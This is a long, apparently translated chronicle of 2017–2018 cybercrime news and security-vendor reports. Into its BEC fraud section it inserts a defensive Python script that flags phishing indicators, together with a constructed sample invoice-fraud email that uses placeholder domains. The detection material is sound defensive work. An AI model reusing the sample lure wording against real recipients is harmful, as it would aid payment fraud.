Another major incident related to cryptocurrency fraud became known in May 2018. Bloomberg reported on the investigation launched in the United States over alleged manipulations with the exchange rate of bitcoin and other cryptocurrencies.
The US Department of Justice is investigating whether traders resorted to illegal practices that affect quotes, such as spoofing. This term refers to flooding the market with fake orders in order to push other traders into buying or selling cryptocurrency.
The Department of Justice is cooperating in the investigation with the Commodity Futures Trading Commission (CFTC), the financial regulator of the bitcoin derivatives market.[23]
Earlier, the Central Bank of the Russian Federation estimated the total damage from theft on the global cryptocurrency market since the beginning of 2018. According to Alisa Melnikova, head of the financial technology department of the Bank of Russia, at the Moscow Exchange Forum held on April 10, since the beginning of this year, 22 large fraudulent schemes have been committed in the world using digital financial assets and cryptocurrencies. As a result, the attackers stole about $1.36 billion in cryptocurrency, or $23 million a day. In January, more than $420 million was withdrawn from the Japanese CoinCheck exchange alone, Melnikova emphasized, referring to the statistics available to the Central Bank.[24]
Cybersecurity Tech Accord
On April 17, 2018, 34 technology and security companies signed the Cybersecurity Tech Accord, an agreement among the largest group of companies in history committed to protecting customers around the world from malicious actions by cybercriminals. The signatories included ABB, Arm, Cisco, Facebook, HP, HPE, Microsoft, Nokia, Oracle and Trend Micro. Together, these enterprises represent the creators and users of the technologies that ensure the operation of the global communication and information infrastructure. The agreement rests on four principles:
- Increased protection - Enterprises will create a more powerful system of protection against cyber attacks. As part of this endeavor, the companies pledged to protect customers around the world regardless of the motives and targets of online attacks.
- Non-aggression - Companies will not assist governments in carrying out cyber attacks and will take measures to protect their products and services from hacking or malicious use at all stages of technological development and distribution.
- Capacity Building - Businesses will make additional efforts to support developers, companies, and private users of their technology, helping them expand their ability to self-protect. Such efforts may include the joint development of new practical security standards and new features that companies will be able to implement in their products and services.
- Collective Action - Companies will develop existing linkages and collaborate on new formal and informal partnerships with other industry, civil society and research communities to scale up technical cooperation, identify vulnerabilities, jointly analyze risks, and minimize the potential for malicious codes in cyberspace.
Despite the fact that many signatories complied with all these principles before the conclusion of the agreement, albeit without publicizing it, this agreement represents a public joint obligation to cooperate in cybersecurity issues. The technology agreement remains open to other signatories from the private sector, regardless of the scale or specialization of their activities, which enjoy a high reputation, strict cybersecurity standards and agree to unconditionally comply with the principles of the document.
Enterprises and organizations of all sizes fall victim to cyber attacks, and the cumulative economic damage from such malicious actions may reach $8 trillion by 2022.[25] Among other harms, recent cyber attacks have led to the closure of small businesses, delays in vital surgical operations and disruptions in the provision of public services.
"The technology agreement will help protect the functional integrity of a trillion network devices that we predict will be operational over the next 20 years," said Carolyn Herzog, chief consultant at Arm. "The agreement brings together the resources, experience and strategic developments of the world's most important technology companies, creating a solid foundation for technology users who can derive the most extensive benefits from a more secure network environment."
Signatories of the Cybersecurity Tech Accord: ABB, ARM, Avast!, Bitdefender, BT, CA Technologies, Cisco, Cloudflare, DataStax, Dell, DocuSign, F-Secure, Facebook, Fastly, FireEye, GitHub, Guardtime, HP Inc., HPE, Intuit, Juniper Networks, LinkedIn, Microsoft, Nielsen, Nokia, Oracle, RSA, SAP, Stripe, Symantec, Telefonica, Tenable, Trend Micro, VMware.
The Cybersecurity Tech Accord is a public joint commitment by 34 international companies to protect and support civil society online and to improve the security, stability and resilience of cyberspace.
Microsoft Security Intelligence Report
In April 2018, Microsoft published its Security Intelligence Report covering the period from February 2017. It is based on data collected by the company's security programs and services (data on the number of detected threats, not on confirmed infections). The data was provided by corporate and private users who agreed to share it together with geolocation.
The report focuses on three topics: botnets, popular hacking methods and ransomware viruses. The purpose of the report's publication is to raise awareness among corporate and private users of existing threats and countermeasures.
The widespread use of botnets and ransomware viruses has led to the fact that the number of devices in Russia that faced cyber threats between February 2017 and January 2018 reached 25-30% on average per month, while the same figure in the first quarter of 2017 was almost half that - 15%. The highest rates were recorded in Pakistan, Nepal, Bangladesh and Ukraine (33.2% or higher), the lowest - in Finland, Denmark, Ireland and the United States (11.4% or lower).
According to Windows Defender Security Intelligence, Trojans have become the most common category of unwanted software. The percentage of their distribution from February 2017 to January 2018 increased from 6% to 10%. Indicators of other types of malware (droppers, obfuscators, ransomware viruses, etc.) amounted to less than 1%.
In 2017, "easy prey" methods such as phishing were used to obtain credentials and other sensitive information from users. According to Microsoft Advanced Threat Protection (ATP), phishing was among the most serious threats in Office 365 user mailboxes in the second half of 2017 (53%), with 180-200 million phishing emails detected monthly. In Russia, 7.01 phishing sites were discovered for every 1,000 hosts (5.85 worldwide). The next most common threats were malware loaders (29%) and Java backdoors (11%).
Another target for attackers is poorly secured cloud applications. The study found that 79% of SaaS cloud storage applications and 86% of SaaS collaboration applications encrypt neither stored nor transmitted information. To protect the enterprise infrastructure, organizations should restrict users to cloud applications that encrypt data and enforce this with a Cloud Access Security Broker (CASB).
Another trend in the second half of 2017 is that cybercriminals use legitimate built-in system tools to run an infected document (for example, a Microsoft Office document) delivered in a phishing email and download ransomware. The best way to avoid this type of threat is to update the operating system and software on time.
Cisco Annual Cybersecurity Report
Malware keeps evolving: attackers now use cloud services and rely on encryption to hide their command-and-control traffic from detection. According to Cisco's 11th annual cybersecurity report (Cisco 2018 Annual Cybersecurity Report),[26][27] in order to reduce the time it takes to detect intruders, cybersecurity experts are increasingly using (and buying) tools based on artificial intelligence (AI) and machine learning (ML).
On the one hand, encryption helps to strengthen protection, on the other hand, the growth of both legitimate and malicious encrypted traffic (50% as of October 2017) multiplies the problems for those defending themselves in the process of identifying potential threats and monitoring their activity. Over the past 12 months, Cisco information security experts have recorded more than threefold growth in encrypted network traffic from inspected malware samples.
The use of machine learning increases the efficiency of network protection and, over time, will automatically identify anomalous patterns in encrypted web traffic, cloud and IoT environments. Some of the 3,600 information security directors interviewed for the Cisco 2018 Security Capabilities Benchmark Study said they trust ML and AI tools and would like to use them, but are disappointed by the large number of false positives. ML and AI technologies, now at the very beginning of their development, are improving over time and will learn to determine the "normal" activity of the networks they monitor.
Some Cisco 2018 Annual Cybersecurity Report Results
Financial damage from attacks is increasingly real
- According to respondents, more than half of all attacks caused financial damage in excess of $500 million, including loss of income, customer outflow, lost profits and direct costs.
Supply chain attacks are becoming more complex and faster
- Such attacks can hit computers on a large scale and can remain active for months or even years. You should be aware of the potential risks of using software and hardware from organizations that do not take information security seriously.
- In 2017, two such attacks infected users with the Nyetya and CCleaner malware through trusted software.
- To reduce the risk of an attack on the supply chain, third-party procedures must be reviewed to test the effectiveness of information security technologies.
Protection is becoming more difficult, vulnerabilities more diverse
To protect themselves, organizations use complex combinations of products from various manufacturers. This complexity, together with an expanding variety of vulnerabilities, impairs organizations' ability to repel an attack and, among other things, increases the risk of financial losses.
- In 2017, 25% of information security specialists reported using products from 11-20 vendors; in 2016, 18% answered this way.
- Information security experts reported that 32% of vulnerabilities affected more than half of their systems; in 2016, 15% answered this way.
Information security experts assessed the benefits of behavioral analysis tools to identify malicious objects
- 92% of specialists believe that behavioral analysis tools do a good job.
- 2/3 of the health sector and the financial services industry find behavioral analytics useful in identifying malicious objects.
Cloud usage is on the rise; attackers take advantage of the lack of advanced security tools
- This year, 27% of information security specialists reported using external private clouds (2016 figure - 20%).
- Of these, 57% place the network in the cloud for better data protection, 48% for scalability, 46% for ease of use.
- Although the cloud provides increased data security, attackers take advantage of the fact that organizations are not very good at protecting evolving and expanding cloud configurations. The security of such configurations is improved by a combination of best practices, advanced security technologies such as machine learning, and first-line security tools such as cloud-based information security platforms.
Malware growth trends and detection times
- The time to detection (TTD) demonstrated by Cisco between November 2016 and October 2017 was about 4.6 hours. In November 2015, this figure was 39 hours, and according to the Cisco Cybersecurity Report for 2017, the median detection time for the period from November 2015 to October 2016 was 14 hours.
- Cloud-based information security technologies have become a key factor for Cisco in reducing detection time and keeping it low. The shorter the detection time, the faster the attack is repelled.
Additional recommendations for information security departments:
- Control compliance with corporate policies and practices for updating applications, systems, and devices.
- Obtain accurate threat data in a timely manner and have processes in place to use this data for security monitoring.
- Perform in-depth and advanced analysis.
- Back up regularly and review recovery procedures; these are critical in the face of the rapid evolution of network ransomware and disruptive malware.
- Perform security checks on microservices, cloud services, and application administration systems.
Indictment of members of the Infraud group
On February 7, 2018, the US Department of Justice announced the indictment of 36 persons belonging to the cybercriminal group Infraud, whose activities damaged consumers, businesses and financial institutions in the amount of more than $530 million. At the same time, hackers intended to steal more than $2.2 billion. Read more here.
Internet faces fragmentation due to cyber attacks
As a result of cross-border cyber attacks, the Internet can break up into separate national and regional sites. This was reported in the report "Global Risks - 2018," presented at the World Economic Forum (WEF) in Geneva.
Fragmentation of the global network could lead to the loss of its functions and a slowdown in technological progress. The development of cybersecurity would help prevent the Internet from splitting into parts; according to the authors of the report, dialogue between governments and technology companies will play a major role in this.
According to the report, there is now more emphasis on developing offensive rather than defensive capabilities in cyberspace. Because of this, there is a "fog of uncertainty in which the potential for miscalculation can cause a spiral of retaliatory punitive measures," the Russian news agency TASS quotes an excerpt from the report. In turn, the adoption of responses can cause a chain reaction, the authors note.
There is a possibility that the real source of the cyber attack will be determined incorrectly and a retaliatory strike will be inflicted on an innocent target. Then the goal will also strike back, and the circle of parties involved in the conflict will expand. As a result of attacks on incorrect targets, physical rather than cyber weapons can even be used.
Currently, the use of conventional weapons is regulated from the legal side, and it is necessary to develop similar norms in relation to the conduct of cyber war, the authors of the report are sure. With such norms, entire classes of cyber weapons could be banned, as is done with chemical and biological weapons.
The clinic paid $55 thousand to cyber extortionists
In early January 2018, the Hancock Health clinic in Greenfield, Indiana, in the United States was hit by a hacker attack using the SamSam ransomware, which paralyzed the operation of the medical facility at the height of the state's flu epidemic. To recover the data quickly, the hospital management paid the extortionists a ransom of 4 bitcoins, worth about $55 thousand at the time of payment. Read more here.
2017
Trends from PandaLabs
- More than half of the attacks stem from a desire to profit financially from them, while espionage has become the second main motivating factor.
- Hidden attacks with adaptive horizontal movements are becoming very common.
- Attackers have increasingly begun to carry out attacks without using malware. They prefer to go unnoticed by traditional defense models without requiring victim interaction. With optimal execution, such attacks can double the profits.
- Tools to exploit vulnerabilities have spawned new attack vectors that also do not require interaction with the victim.
- The goal is the end devices. The perimeter has become blurred, mobility is the norm for almost any company, and therefore corporate networks have become more and more vulnerable.
- Former employees of enterprises are trying to blackmail their previous employers by initiating attacks from within companies.
- Also in 2017, we saw an increasing presence of organized cyber crime groups such as the Lazarus Group, attacking media, aerospace and financial sectors, and critical infrastructure in the United States and elsewhere in the world.
- Cyber wars and cyber armies: There is a full-scale arms race in cyber space, and many states are setting up command cyber centers to increase the level of protection against attacks targeting their companies and infrastructures.
Year results and forecasts from Positive Technologies
The past year, according to Positive Technologies experts, was remembered for the following events and trends:
- Ransomware viruses. The lack of current updates and the habit of living with vulnerabilities led to the shutdown of Renault factories in France, Honda and Nissan in Japan; banks, schools, energy, telecommunications companies were affected.
- Practical security. The fight against "paper security" began at the highest level. Federal Law N 187-FZ "On the Security of the Critical Information Infrastructure of the Russian Federation" not only recommends but obliges state and commercial companies to protect themselves, and introduces mechanisms to control the effectiveness of protective measures.
- Telecom vulnerabilities began to be exploited. Attackers began to intercept two-factor authentication codes using vulnerabilities in the SS7 signalling protocol. O2-Telefonica subscribers were the first to suffer.
- "Scalable" attacks on ATMs. ATMs have been robbed for a long time and in various ways, for example, they are tied to a car cable and taken away. But when cybercriminals began to connect to the bank's local network and remotely monitor many ATMs, banks had a serious cause for concern.
- Covert mining. In the spring of 2017, our experts discovered hundreds of computers in large companies that were mining cryptocurrency for unknown attackers. The miner exploited the same vulnerability as WannaCry and then protected the captured PCs from the ransomware.
- Entry via IoT. No sooner had the noise around IoT security from botnets and DDoS attacks subsided than petrochemical plants began to be stopped via unprotected "smart" coffee machines, and smart aquariums were used to attack casinos.
- Bitcoins and vulnerable web. By the end of the year, Bitcoin was ahead of the Russian ruble in terms of capitalization, and hackers focused on blockchain startups. The simplest attack scheme is to find vulnerabilities on the ICO website and replace the address of the wallet to collect investments. Israeli CoinDash thus lost $7.5 million.
- Epidemic of targeted attacks. The number of companies facing APT attacks in 2017 has almost doubled. At the same time, attacks are becoming more complicated right before our eyes, methods are being actively used that make it difficult to analyze and investigate incidents.
Among the forecasts for 2018, Positive Technologies experts note the following:
- The response to the complication of the attacks was the growing interest in building security monitoring centers (SOCs). This year alone, about 10 companies have begun to create their SOCs in some form. In 2018, the number of SOCs will triple.
- The State System for the Detection, Prevention and Elimination of the Consequences of Computer Attacks and the requirements of Law N 187-FZ do not guarantee that a system cannot be hacked, but meeting these requirements and creating the centers of this system will cut off 90% of primitive attacks, allowing you to concentrate on high-level ones.
- The growth of logical attacks on ATMs will continue (in the first half of 2017 alone, the total volume of attacks of this type in European countries increased by 500%). Banks, in turn, will become even more interested in the real threats that can cause financial losses and in assessing the risks.
- Mobile network vulnerabilities can cost lives. Using mobile networks, self-driving cars exchange data on speed, location of cars on the track and other data. DDoS attacks can leave such a car literally without "feelings and eyes." Another example is smart traffic lights connected to mobile networks. As part of the working groups, our experts drew the attention of mobile operators to the insecurity of the Diameter protocol. Thanks to this, operators decided to abandon the Diameter protocol in the next generation 5G networks and replace it with an alternative option.
- Attackers' attention will turn to web wallets: convenient but insecure, sooner or later they will be hacked. We also predict an increase in the number of hacks of blockchain projects' web applications through phishing.
- Hardware attacks, such as exploiting a vulnerability in the Intel Management Engine, are awaiting a renaissance. If attackers manage to use them, targeted attacks, as well as cryptolocker attacks, will move to another level, where not only is data blocked but the motherboard itself is bricked.
Trend Micro Forecasts
In December 2017, Trend Micro published its annual report with information security forecasts for 2018, "Paradigm Shifts: Trend Micro Security Predictions for 2018".[28] According to the forecasts, the use of known vulnerabilities in attacks will increase as the attack surface of modern enterprises grows, opening up more and more security holes. To protect the organization's most valuable data, management must shift priorities towards patch management and employee training.
According to the report, according to Trend Micro forecasts for 2018, in the process of merging information (IT) and operating (OT) technologies, enterprise applications and platforms are at risk of manipulation and vulnerabilities. In addition, Trend Micro predicts an increase in Internet of Things (IoT) vulnerabilities as more devices are manufactured without regard to security rules and industry standards. In general, the growth of network connectivity and the increased attack surface create new opportunities for cybercriminals who use known security flaws to penetrate the corporate network.
Ransomware will remain a key component of the cyber threat landscape, as it has proven successful. The company expects an increase in targeted ransomware attacks, in which individual enterprises will be at risk and their managers forced to pay a larger ransom. Business e-mail compromise (BEC attacks) will also gain popularity among cybercriminals, since the payoff from a successful attack is very high.
Cybercriminals will also use increasingly influential technologies - blockchain and machine learning - to mask their activities from traditional methods of protecting information. For this reason, Trend Micro recommends a layered strategy using multi-generational security technologies that combines advanced security tools backed by nearly 30 years of company experience in protecting the world's largest brands.
The main conclusions are:
- According to experts, global losses from BEC attacks in 2018 will exceed $9 billion.
- Cybercriminals will start using machine learning and blockchain technologies in their hacking techniques. The DAO (Decentralized Autonomous Organization), the first decentralized venture capital fund built on the Ethereum blockchain, was subjected to a large-scale attack. As a result of the exploitation of an error in the DAO code, more than $50 million of electronic cash disappeared from the project's accounts.
- In 2018, ransomware will remain the main tool for making a profit, although other types of cybercrime will gain momentum
- In 2018, cybercriminals will find new ways to exploit gaps in IoT-class devices for their own benefit. In addition to DDoS attacks, attackers will use IoT devices to create proxy servers in order to hide their real location and web traffic. The reason for this trend is that when conducting investigations, the police most often rely on the IP address in the logs. More and more devices such as biometric trackers, drones, audio speakers and voice assistants will be hacked to extract accumulated data, enter homes, etc.
- Enterprise applications and platforms will be at risk of misuse and vulnerabilities. SAP and other enterprise resource planning systems can be compromised. If the data being processed has been modified or an incorrect command sent in the ERP system, computing can become a sabotage tool, leading to erroneous decisions such as incorrect resource amounts, unwanted money transfers, and even overloading systems
- Cyber propaganda campaigns will become more refined thanks to the use of already tested spam mailing methods
- Most companies will begin to comply with the European General Data Protection Regulation (GDPR) only after the first high-profile lawsuit.
US intelligence agencies: Islamic State "gone" to the virtual world
The terrorist organization Islamic State (IS) after the defeat in Syria settled in cyberspace. This assumption was put forward by representatives of the US intelligence services in early December 2017.
"IS's ability to contact people sympathetic to them through social networks is unprecedented and gives the organization a chance to reach a large number of extremists in different countries," said Laura Shayo, head of intelligence at the US National Counterterrorism Center.
Thus, according to representatives of the special services, terrorists will continue to promote their ideology through the Internet.
Ron Johnson, a spokesman for the National Security and State Affairs Committee, also believes that the "new caliphate" is now located in cyberspace.[29]
PwC: Russian companies caught up with American in terms of cybersecurity
60% of Russian companies have a cybersecurity strategy. In this respect Russia has overtaken Germany (45%), France (51%) and Italy (55%) and caught up with the USA (also 60%). This was reported by Izvestia with reference to a report by the consulting company PricewaterhouseCoopers.[30][31][32]
The most cyberattack-proof countries are Malaysia (74%), Japan (72%) and Indonesia (70%), according to the report. The main difference between Russian companies and foreign ones is that not all of them choose and use international cybersecurity standards in practice and, as a result, certain aspects of protection against cyber threats are often missed. At the same time, abroad, these standards are often mandatory.
According to the report, the most serious cyber threats in Russian companies are considered a violation of data privacy (48%), a violation of the normal course of the company's activities (47%), a decrease in product quality (27%) and the creation of a threat to life (21%).
As noted in the report, most employees of the surveyed Russian companies called phishing attacks the main causes of cyber incidents. In second place was the use of mobile devices - more than a quarter of respondents indicated this problem.
As experts noted, the public sector spends the most funds on protection against cyber threats. Government agencies purchase large volumes of software and hardware protection tools and implement large IT projects. At the same time, banks are leading in this issue in terms of the effectiveness of protection against cyber incidents.
Experts also note that Russia and the United States are world leaders in the field of cybersecurity. Having achieved certain successes in this market, the Russian Federation will be able to export products and services for protection against cyber threats abroad, they say.
Kaspersky Lab data
According to a Kaspersky Lab study involving more than 350 representatives of industrial organizations around the world, including Russia, over the past 12 months, every second industrial company in the world has experienced from one to five cyber incidents - they have affected critical infrastructures or automated process control systems (APCS) at these enterprises. Each company spent an average of $497 thousand to eliminate the consequences of these incidents that occurred during the year.
The survey also showed that encountering cyber threats did not come as a surprise to industrial enterprises: three quarters of companies admit the likelihood of suffering from a cyber attack. Moreover, 83% of respondents consider themselves well prepared for an incident in their industrial infrastructure.
Today, companies most fear malware infection. Reality shows that this fear is not unfounded: 53% of enterprises affected by incidents confirmed encounters with various malware. Moreover, about a third of companies (36%) were targeted. Thus, malware and well-planned targeted operations have become the dominant threats to industrial and critical infrastructures.
At the same time, the study showed that companies often underestimate internal threats, fearing risks from outside. Thus, 44% of organizations believe that their cybersecurity is likely to be threatened by any third parties, for example, suppliers. And 33% believe that ransomware poses the greatest danger to them. However, more often cyber incidents in industrial networks occur due to errors and unintentional actions of personnel - it was this factor that threatened almost a third (29%) of companies.
How a fraudster cheated airlines out of $32 million and got five years in prison
In June 2017, a fraudster who caused $32 million in damage to airlines and travel agencies was sentenced in the United States to almost five years in prison. Eric Donys Simeu, a 32-year-old citizen of Cameroon, had pleaded guilty in December 2016.[33]
According to court documents, Simeu and his accomplices spent a long time sending phishing emails in the name of Travelport and SABRE, the largest operators of global distribution systems (GDS), to those operators' main customers, including airlines and ticket booking and sales agents. Victims were lured to a malicious site where they were asked to enter their logins and passwords, which the attackers then used to gain access to the networks of the distribution systems themselves.
As a result, between July 2011 and September 2014, Simeu and his accomplices fraudulently booked more than two million dollars' worth of flights. The tickets were either resold at inflated prices to residents of West African countries or used by gang members for their own travel.
Simeu was detained in September 2014 at Paris Charles de Gaulle Airport; an international arrest warrant had already been issued for him by then. After 18 months in a French prison he was extradited to the United States, where he stood trial. His guilty plea earned him a comparatively light sentence: four years and ten months in prison and restitution of $162,146 to Travelport.
"Fraud costs businesses worldwide billions of dollars annually, even though the intruders' methods are not notable for their variety: there is nothing new in the scheme under which Simeu and his accomplices, who for some reason remain unknown, worked," said Dmitry Gvozdev, CEO of Security Monitor. "Simeu finally went to jail, yet, if you think about it, he could not be tracked down for three years, his accomplices remain unknown, and the damage remains unrecovered. Besides, one rogue phisher is a drop in the ocean. The key to effective protection against such fraud is regular training of users, primarily corporate employees, in how to recognize and counter phishing attempts."
Russian hackers get a chance at industrial espionage with NSA exploits
In May 2017, The Shadow Brokers announced that in future it plans to distribute its exploits and hacking tools only by subscription; previously the group had published them publicly. Those who wish will now have to pay about 20 thousand dollars a month, in the Zcash cryptocurrency.[34]
The subscription, which The Shadow Brokers themselves call the "Wine of Month Club",[35] costs potential subscribers a round sum: 100 ZEC per month. ZEC is Zcash, a cryptocurrency launched in October 2016.[36]
The "brokers" note, however, that they may change the payment system at any time. At the end of May 2017, 100 Zcash was worth about $21 thousand. Those who pay the required amount and provide contact details are sent links to the archive of exploits and the password to it.
The "brokers" do not disclose the contents of the June archive, noting only that it will interest hackers, IT security companies, governments and OEMs. A July "sale" was also pre-announced, but The Shadow Brokers had not yet decided what to include in it and what to leave out.
"Something valuable for someone," the group's members write in their trademark broken English. "...The time of 'I will show you mine, if you show yours first' is ending. Nations see what happens when The Shadow Brokers show theirs first. That is the wrong question. The question to be asked is: 'Can my organization afford not to be the first to access The Shadow Brokers archive?'"
The Shadow Brokers group is known solely as the distributor of hacking tools stolen from the Equation Group, a group closely associated with the US National Security Agency. Most of these exploits target vulnerabilities in Microsoft products.
In 2016, The Shadow Brokers tried several times to cash in on its loot, putting exploits up for sale or trying to raise money through crowdfunding. In April 2017 the group published the password to archives of malicious tools it had previously tried to sell, and then, on April 14, posted a new archive with many exploits for Windows, including ETERNALBLUE, DARKPULSAR and others.
The ETERNALBLUE exploit was soon used by the creators of the WannaCry ransomware worm, whose spread became a global epidemic. This happened even though a month before the release Microsoft had issued updates (MS17-010, March 14, 2017) fixing all or most of the vulnerabilities targeted by the NSA exploits; the machines hit by WannaCry were those on which the patch had not been applied.
"The price is quite high, but it is possible that The Shadow Brokers' plan will work," says Dmitry Gvozdev, CEO of Security Monitor. "All interested parties have already had the opportunity to see that the group really does have working and very dangerous tools at its disposal. So it can be assumed that both governments and cybercriminals, including Russian ones, will agree to invest such large sums to obtain these weapons. For cybersecurity in general, this bodes nothing good."
The largest cyber scheme in the financial market
On May 22, 2017, Ukrainian hacker Vadim Yermolovich was sentenced to 2.5 years in prison for taking part in a criminal scheme that earned its participants more than $100 million, the US Department of Justice said.
The 29-year-old Ukrainian, detained in 2014, was sentenced by U.S. District Judge Madeline Cox Arleo in Newark, New Jersey. Acting U.S. Attorney William Fitzpatrick announced the verdict.
Yermolovich pleaded guilty to conspiracy to hack computers and steal identity data. The fraudsters stole corporate press releases before their official publication and sold the insider information to traders, who used it to profit on the stock market.
Russian traders also took part in the fraud; they supplied the hackers with lists of desired press releases and preferred companies, among them Caterpillar, Home Depot and Panera Bread.
According to the US authorities, between February 2010 and August 2015 the hackers stole more than 150 thousand corporate releases intended for the media from the Business Wire, Marketwired and PR Newswire portals, earning about $100 million.
Reuters notes that this is the largest known hacking scheme used to play the financial markets, and 29-year-old Vadim Yermolovich of Kyiv became the first member of the group to plead guilty. Given this mitigating circumstance, the judge sentenced him to 30 months in prison.
The U.S. Securities and Exchange Commission has brought charges against more than 40 people. Ten defendants, three hackers and seven traders, face criminal charges in New Jersey and New York; five have pleaded guilty.[37]
Ransomware extortionists demand almost four times as much from victims
The average ransom demanded by ransomware extortionists from their victims grew by 266% in 2016, according to the annual Internet Security Threat Report prepared by the security company Symantec.[38]
In 2015, attackers who encrypt data on a computer with malware (ransomware) and demand money to unlock it asked users for $294 on average; in 2016 the amount rose to $1,077.
Experts cite victims' willingness to pay as the main reason for the extortionists' rapidly growing appetites. Criminals usually demand the ransom in cryptocurrency, since it offers anonymity and irreversible transactions. According to Symantec, 34% of users worldwide who encounter ransomware agree to transfer the amount demanded. Paying, however, in no way guarantees that the user gets their data back: only 47% of victims who pay regain access to their encrypted files, the experts warn.
In the United States, victims are even more willing to pay: 64% of users comply with the criminals' demands. Symantec believes this is why the United States leads in the number of recorded ransomware infections; in 2016 the country accounted for 34% of all recorded infections. Japan and Italy round out the top three, with 9% and 7% respectively. The statistics indicate that hackers more often attack developed countries with stable economies.
Russia is also among the ten countries most popular with cybercriminals: according to Symantec, the Russian Federation accounted for 3% of ransomware infections last year, the same share as the Netherlands, Germany, Australia and Great Britain. Canada and India account for 4% each.
Interpol: cyber fraud in West Africa has become a source of wealth and an object of worship
In March 2017, it became known that over the past three years fraudsters from West Africa had caused $3 billion in damage to Western businesses, according to a study by Interpol and Trend Micro.[39]
Earnings from fraudulent schemes have become so popular in West African countries that in Ghana, for example, Internet fraud has even acquired its own patron spirit.
The study notes that in recent years attackers have most often used a scheme called Business Email Compromise (BEC). The attackers send fake but very plausible-looking invoices for payment, as well as fake internal memos, to potential victims, hoping that one of the company's employees responsible for finances will take the bait and transfer money to the fraudsters' accounts.
Sometimes these messages carry attachments containing keyloggers; if the attack succeeds, the attackers gain access to the victims' bank accounts and can transfer money directly.
Between October 2013 and May 2016, fraudsters using BEC schemes stole more than three billion dollars from Western companies; in the United States alone, businesses lost almost one billion dollars in this period. Sometimes, though by no means always, the victims manage to cancel the payments and recover the funds.
"West African cyber fraudsters are increasingly using more complex schemes than before, conducting more thoughtful operations and using more sophisticated business models; the emphasis is shifting toward BEC and tax fraud in particular," the report says. Thanks to their experience and ingenuity in social engineering, as well as a rich set of malicious tools (keyloggers, remote administration tools, ransomware and antivirus evasion tools), West African cybercriminals steal large sums from individuals and companies around the world.
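The BEC lures described above and the credential-phishing emails in the Simeu case share the same header-level tells: a display name borrowing a trusted brand, a sender or link domain one or two characters away from the real one, a Reply-To that diverts the thread elsewhere, and invoice or urgency wording. The script below is an added illustration of triaging for those indicators; it is not code from the Interpol/Trend Micro report or from the Simeu case file. The trusted-brand list, the `.example` domains and both sample messages are constructed for the example.

```python
"""Header-level triage for BEC and credential-phishing lures.

Added illustration, not code from the Interpol/Trend Micro report or the
Simeu case file; the trusted-domain list and both messages are constructed."""
from email import message_from_string
from email.utils import parseaddr
from typing import List, Optional
import re

# Assumed: brands the organisation pays, mapped to the domain they really mail from.
TRUSTED = {"acme air": "acme-air.example", "globaldist": "globaldist.example"}

# Wording typical of invoice / wire-transfer pretexts.
PRESSURE = re.compile(r"\b(urgent|invoice|wire|payment|overdue|immediately)\b", re.I)


def edit_distance(a: str, b: str) -> int:
    """Levenshtein distance; a distance of 1-2 to a trusted domain marks a cousin domain."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def domain_of(addr: str) -> str:
    return addr.rsplit("@", 1)[-1].lower() if "@" in addr else ""


def lookalike_of(domain: str) -> Optional[str]:
    """Return the trusted domain that `domain` imitates, or None if it is exact or unrelated."""
    for trusted in TRUSTED.values():
        if domain != trusted and edit_distance(domain, trusted) <= 2:
            return trusted
    return None


def triage(raw: str) -> List[str]:
    """Return the BEC indicators found in one RFC 822 message (empty list = nothing suspicious)."""
    msg = message_from_string(raw)
    findings = []
    from_name, from_addr = parseaddr(msg.get("From", ""))
    _, reply_addr = parseaddr(msg.get("Reply-To", ""))
    from_dom, reply_dom = domain_of(from_addr), domain_of(reply_addr)

    # 1. Display name borrows a trusted brand, but the address is not that brand's domain.
    if from_dom not in TRUSTED.values():
        for brand in TRUSTED:
            if brand in from_name.lower():
                findings.append(f"display name '{from_name}' does not match sender domain {from_dom}")
                break
    # 2. Cousin domain: one or two characters away from a domain we trust.
    imitated = lookalike_of(from_dom)
    if imitated:
        findings.append(f"sender domain {from_dom} imitates {imitated}")
    # 3. Reply-To diverts the conversation to a different domain.
    if reply_addr and reply_dom != from_dom:
        findings.append(f"Reply-To domain {reply_dom} differs from From domain {from_dom}")
    # 4. Invoice / urgency wording in the subject.
    if PRESSURE.search(msg.get("Subject", "")):
        findings.append("subject uses payment or urgency pressure wording")
    # 5. Links in a plain-text body whose host imitates a trusted domain (the Simeu-style lure).
    body = msg.get_payload() if not msg.is_multipart() else ""
    for host in re.findall(r"https?://([\w.-]+)", body):
        if lookalike_of(host.lower()):
            findings.append(f"link host {host} imitates a trusted domain")
    return findings


# Constructed samples: a BEC-style invoice lure and a genuine message from the real domain.
BEC_SAMPLE = (
    "From: Acme Air Accounts Payable <ap@acme-alr.example>\n"
    "Reply-To: ap.acme@freemail.example\n"
    "Subject: URGENT: overdue invoice 4471, wire today\n"
    "\n"
    "Please settle the attached invoice via http://acme-alr.example/portal before 17:00.\n"
)
LEGIT_SAMPLE = (
    "From: Acme Air Accounts Payable <ap@acme-air.example>\n"
    "Subject: Monthly statement\n"
    "\n"
    "Your statement is available at https://acme-air.example/statements\n"
)

if __name__ == "__main__":
    for label, sample in (("BEC", BEC_SAMPLE), ("legit", LEGIT_SAMPLE)):
        print(label, triage(sample) or ["no indicators"])
```

The lure trips all five checks while the genuine statement trips none. Header heuristics of this kind are a first filter, not a verdict: the robust control against BEC is an out-of-band confirmation of any change to payment details, which no mail filter can replace.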
The reason West Africa has become a hotbed of cyber fraud is plain: almost half of university graduates there cannot find work for at least a year after graduating, and taking part in cyber fraud schemes is a very attractive alternative to poverty and hunger.
It is mainly from such young, educated but unemployed people that the "brigades" of cyber fraudsters are formed. Interpol and Trend Micro researchers identified two large groupings operating in West Africa.
The first is the so-called Yahoo! Boys, who mainly deal in traditional kinds of fraud, such as "Nigerian" spam. Beyond that, the Yahoo! Boys are actively moving into romance scams and spam asking the recipient to urgently send money to a traveler allegedly in trouble abroad.
The Yahoo! Boys owe their name to the fact that until very recently they coordinated through the Yahoo portal's chat. Typical members are young people in their twenties who love to brag about their wealth on social networks. Although their fraud methods are simple and banal, they still bring them considerable income.
Criminals of a higher level (Next Level Criminals) pose a much greater threat.
Their professional level is very high. Before an operation they gather information about potential victims from every available source, mainly of a financial nature, which makes their attacks far more effective.
In addition, these scammers control a vast network of "money mules", people who, for a small commission, quickly cash out stolen funds.
Attackers of this kind literally earn billions, although unlike the Yahoo! Boys they choose not to advertise their fortunes. Interpol periodically tries to fight these criminals, but the efforts rarely succeed: only in 30% of cases where data is handed to local police is the offender arrested.
